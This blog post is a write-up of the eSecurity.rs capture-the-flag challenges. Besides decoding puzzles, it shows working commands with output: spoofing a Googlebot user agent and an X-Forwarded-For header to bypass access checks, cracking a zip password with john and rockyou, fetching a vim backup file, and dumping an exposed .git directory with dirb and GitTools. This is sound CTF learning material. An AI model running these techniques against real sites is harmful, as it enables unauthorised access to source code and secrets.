CREATIVE CHAOS   ▋ blog

eSecurity.rs CTF

PUBLISHED ON 31/03/2020 — EDITED ON 11/12/2023 — INFOSEC

Pastebin style!

http://hfl.esecurity.rs:8000

Warming UP

1 Flag format is always esecurity{xxxxx}.

Can you find the first flag? ZXNlY3VyaXR5e3dhcm1pbmdfdXB9

base64

The F word

2 We’ve found this strange code and we’re unsure what it is. Can you help us and decode it and recover the flag?

JSFuck

This txt file wont open? Hm.

2 Can you open this file?

On unixids (MacOS), nobody cares about extensions, magic bytes rule…

Can you see us?

Can you see us? 3 Can you? http://178.22.217.52/canyouseeme/

Cookies

curl -I http://178.22.217.52/canyouseeme/

Some beeping sounds

4 We’ve discovered this strange audio file on one of our servers. It should contain the flag but we weren’t able to recover it. While trying to recover the flag 2 of our team members ended up like Jack Nicholson in The Shining. Third one ended up like Jack Nicholson in One Flew Over the Cuckoo’s Nest.

Hint: don’t forget about correct flag format: esecurity{XXXXXXX}

https://www.sonicvisualiser.org/download.html

–..– –..– – — .-. … . .. … ..-. ..- .- .. … - …. . ..-. .-.. .- –. -… ..- - -.. — -. - ..-. — .-. –. . - - …. . -.-. ..- .-. .-.. - .-.. -… .-. .- -.-. -.- . - …

https://cryptii.com/pipes/morse-code-to-text

Read the flag to get the answer.

##Logo

5

Someone told us that there is something hidden in our logo. Could you please check and let us know?

$ exiftool
...
User Comment                    : 5c87N7XYVY7kmTLaVN5NU5smnqrL3adgwtSBPd5N
...

https://gchq.github.io/CyberChef/

Thanks to EK for cracking this one :D

base58 bitcoin

How About Some Crypto?

5 We encrypted this flag very securely. There is no way you’ll be able to decode it.

Vigenere dcode.fr

Robots

5

This challenge is not meant for you. See, you won’t be able to get the flag: http://hfl.esecurity.rs/robots/

curl -A "'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)')" http://178.22.217.52/robots/flag/flag.txt

I was cool but now I just zip to forget :(

5 We’ve created this challenge but unfortunately we can’t remember the password. Guess there is no way to recover it now. Maybe we can trow rocks on it and hope it breaks open?

$ zip2john flag.zip > key.txt
kali@kali:~/Documents/esecurity$ john --format=zip --wordlist=/usr/share/wordlists/rockyou.txt key.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any other key for status
Badminton1234    (flag.zip/flag.txt)
1g 0:00:10:13 DONE (2020-03-31 14:48) 0.001629g/s 18526p/s 18526c/s 18526C/s Bado89..Badgirl01
Use the "--show" option to display all of the cracked passwords reliably
Session completed
kali@kali:~/Documents/esecurity$ 7z e flag.zip

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU Intel(R) Xeon(R) CPU E5-2676 v3 @ 2.40GHz (306F2),ASM,AES-NI)

Scanning the drive for archives:
1 file, 231 bytes (1 KiB)

Extracting archive: flag.zip
--
Path = flag.zip
Type = zip
Physical Size = 231


Enter password (will not be echoed):
Everything is Ok

Size:       39
Compressed: 231
kali@kali:~/Documents/esecurity$ cat flag.txt
esecurity{flag}

Home Sweet Home

6 Our security engineers hardened this flag so it’s only accessible within our own network. There is no way you’ll be able to recover it: http://hfl.esecurity.rs/fromhome/flag.txt

curl --header "X-Forwarded-For: 127.0.0.1" "http://hfl.esecurity.rs/fromhome/flag.txt

Leak me

6 I just came here to show you my crazy php coding skillz: http://hfl.esecurity.rs/leakme/

this is my php script. actually it's not a php script, it's just text
file with a fancy extension.
Don't be harsh, I'm still learning this.
After almost 60 days stuck in it,
I've finally managed to learn how to exit vim but
during exiting I've probably made some changes
to vim configuration and some hackers told me that
now my source code is leaking.
Please don't hack me.

Vim is storing backup files with ~.

http://hfl.esecurity.rs/leakme/index.php~

It Came From God

6 You’ll retrieve this flag only by praying

Image

https://en.wikipedia.org/wiki/The_Ciphers_of_the_Monks

https://www.asciitable.com

101 115 101 99 117 114 105 116 121 123 99 111 100 101 95 111 102 95 103 111 100 125 esecurity{xxx}

Easier way: https://www.dcode.fr/cistercian-numbers

Thanks to EK for cracking this one with me.

OSINT and Crypto

6

First you’ll need to find out who I am. That will help you to decode this message.

I’m the one who invented both of these stuff:

osintcrypto.txt

{"encrypted_flag" : "CNHPARVNE9MQ8YBVD9SPYVJZC5Q68QVMD1MQ6QVKEHS62VK7CNFP4RBKCMSK4Z8"}

json and encoding

https://en.wikipedia.org/wiki/Douglas_Crockford

https://www.dcode.fr/crockford-base-32-encoding

##My Secure Blog 10 No more Wordpress for me, I’m not a noob anymore. I’ve created this static html website, super secure, unhackable. Wordpress is now removed and I have backups and version control. No way you’re be able to hack me.

Check it out: http://178.22.217.52/mysecureblog/

http://178.22.217.52/mysecureblog/

Source:

<!--Don't forget to remove version-control system from web root before deployment -->
kali@kali:~/opt/dvcs-ripper$ dirb http://178.22.217.52/mysecureblog/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Apr  1 12:25:28 2020
URL_BASE: http://178.22.217.52/mysecureblog/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://178.22.217.52/mysecureblog/ ----
+ http://178.22.217.52/mysecureblog/.git/HEAD (CODE:200|SIZE:23)
+ http://178.22.217.52/mysecureblog/index.html (CODE:200|SIZE:1614)

-----------------
END_TIME: Wed Apr  1 12:28:29 2020
DOWNLOADED: 4612 - FOUND: 2

http://178.22.217.52/mysecureblog/.git/HEAD

ref: refs/heads/master

http://178.22.217.52/mysecureblog/.git/config

https://github.com/internetwache/GitTools

kali@kali:~/opt/GitTools/Dumper$ ./gitdumper.sh http://178.22.217.52/mysecureblog/.git/ aa
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########


[*] Destination folder does not exist
[+] Creating aa/.git/
[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[+] Downloaded: config
[+] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[-] Downloaded: packed-refs
[+] Downloaded: refs/heads/master
[-] Downloaded: refs/remotes/origin/HEAD
[-] Downloaded: refs/stash
[+] Downloaded: logs/HEAD
[+] Downloaded: logs/refs/heads/master
[-] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[+] Downloaded: objects/39/42bcae4b0bee131298b40f4a7c5afcb490fab2
[-] Downloaded: objects/00/00000000000000000000000000000000000000
...
kali@kali:~/opt/GitTools/Extractor/aa$ ./extractor.sh ../Dumper/aa/ aa
kali@kali:~/opt/GitTools/Extractor/aa/0-3942bcae4b0bee131298b40f4a7c5afcb490fab2$ grep -H esecurity *
grep: css: Is a directory
grep: images: Is a directory
grep: includes: Is a directory
grep: js: Is a directory
grep: maint: Is a directory
grep: network: Is a directory
grep: user: Is a directory
users.php:secret esecurity stuff: ZXNlY3VyaXR5e2dpdF9kdW1wZXJfb3duc195b3V9
[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
kali@kali:~/Documents/esecurity/aa$ echo 'ZXNlY3VyaXR5e2dpdF9kdW1wZXJfb3duc195b3V9' | base64 -d
esecurity{FLAG}

RANDOM

import codecs
codecs.decode('aa','rot_13')
codecs.encode('nn','rot_13')

See Also